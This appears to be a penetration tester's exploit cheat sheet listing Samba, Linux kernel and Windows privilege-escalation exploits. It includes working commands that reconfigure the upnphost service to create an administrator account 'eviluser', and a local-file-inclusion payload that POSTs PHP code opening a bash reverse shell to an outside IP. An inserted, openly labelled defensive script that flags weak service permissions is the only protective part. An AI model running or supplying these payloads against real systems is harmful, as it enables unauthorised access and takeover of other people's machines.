# Common Exploits

## Samba trans2open Overflow (Linux x86) / 10.11.1.22

> This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8.

## Dirty COW exploit

> Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE\_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)

## Linux Kernel 2.6.39 < 3.2.2 - 'Mempodipper' Local Privilege Escalation

## WebDAV exploit

> windows/iis/iis\_webdav\_upload\_asp

## linux/samba/trans2open (Samba 2.2.x) - [exploitdb-link](https://www.exploit-db.com/exploits/10) Samba < 2.2.8

> Exploit to use against the Samba service

## Exploit Title: Windows x86 (all versions) AFD privilege escalation (MS11-046), works on Win7/Windows Server 2008 and earlier OSes. - afd.sys Privilege Escalation (MS14-040), PoC

## accesschk.exe

```
# sc config upnphost binpath= "net eviluser testxlab Password1 /add"
# sc config upnphost binpath= "net localgroup Administrators eviluser /add"
# sc stop upnphost
# sc start upnphost
```

**To view the service's configuration**

```
# sc qc upnphost
```

**Checking service permissions**

```
# accesschk-xp.exe  -uwcqv "Authenticated Users" * /accepteula
```

> Usage to be written

**Notes**

> On systems such as Windows XP, XP SP1 and SP2, you can escalate privileges through the upnphost service.
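
A defender's counterpart to the accesschk check above, as an added example that is not part of the original notes: it parses the SDDL string that `sc sdshow <service>` prints and flags allow-ACEs giving broad groups such as Authenticated Users the right to reconfigure a service. The function names and the sample SDDL strings are constructed for illustration.

```python
import re

# SDDL right codes (service-object meaning) that let the trustee take over a service.
DANGEROUS = {"DC": "SERVICE_CHANGE_CONFIG", "WD": "WRITE_DAC",
             "WO": "WRITE_OWNER", "GA": "GENERIC_ALL", "GW": "GENERIC_WRITE"}
# SDDL SID aliases for broad, low-privilege groups.
BROAD = {"AU": "Authenticated Users", "WD": "Everyone",
         "BU": "BUILTIN\\Users", "IU": "INTERACTIVE"}


def weak_aces(sddl):
    """Return (trustee, [rights]) for every allow-ACE that grants a broad
    group a right permitting service reconfiguration.
    Limitation: rights written as a hex mask (0x...) are not decoded."""
    m = re.search(r"D:(.*?)(?=S:|$)", sddl)        # DACL sits between D: and S:
    findings = []
    for ace in re.findall(r"\(([^()]*)\)", m.group(1) if m else ""):
        fields = ace.split(";")                    # type;flags;rights;obj;inh;sid
        if len(fields) < 6 or fields[0] != "A":    # only access-allowed ACEs
            continue
        rights, sid = fields[2], fields[5]
        if sid not in BROAD:
            continue
        granted = [DANGEROUS[r] for r in re.findall("..", rights) if r in DANGEROUS]
        if granted:
            findings.append((BROAD[sid], granted))
    return findings


def audit(services):
    """Map service name -> findings, keeping only services with a weak DACL."""
    return {name: f for name, sddl in services.items() if (f := weak_aces(sddl))}


# Constructed sample `sc sdshow` output, not captured from a real host.
SAMPLE = {
    # Authenticated Users hold DC (change config): the weakness described above.
    "upnphost": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)",
    # Hardened: Authenticated Users can only query; the SACL after S: is ignored.
    "spooler": "D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;CCLCSWRPWPDTLOCRRC;;;SY)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
}

if __name__ == "__main__":
    for name, findings in audit(SAMPLE).items():
        for trustee, rights in findings:
            print(f"{name}: {trustee} -> {', '.join(rights)}")
```

Any service it reports should have the offending ACE removed (for example with `sc sdset`) so that only administrators and SYSTEM can change its configuration.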

## LFI to RCE

```
POST /section.php?page=php://input%00

[HTTP POST DATA] 
<?php echo shell_exec("bash -i >& /dev/tcp/10.11.0.94/443 0>&1 2>&1"); ?>
```

### MS11-080

{% embed url="https://hackingandsecurity.blogspot.com/2016/05/ms11-080-privilege-escalation-windows.html" %}

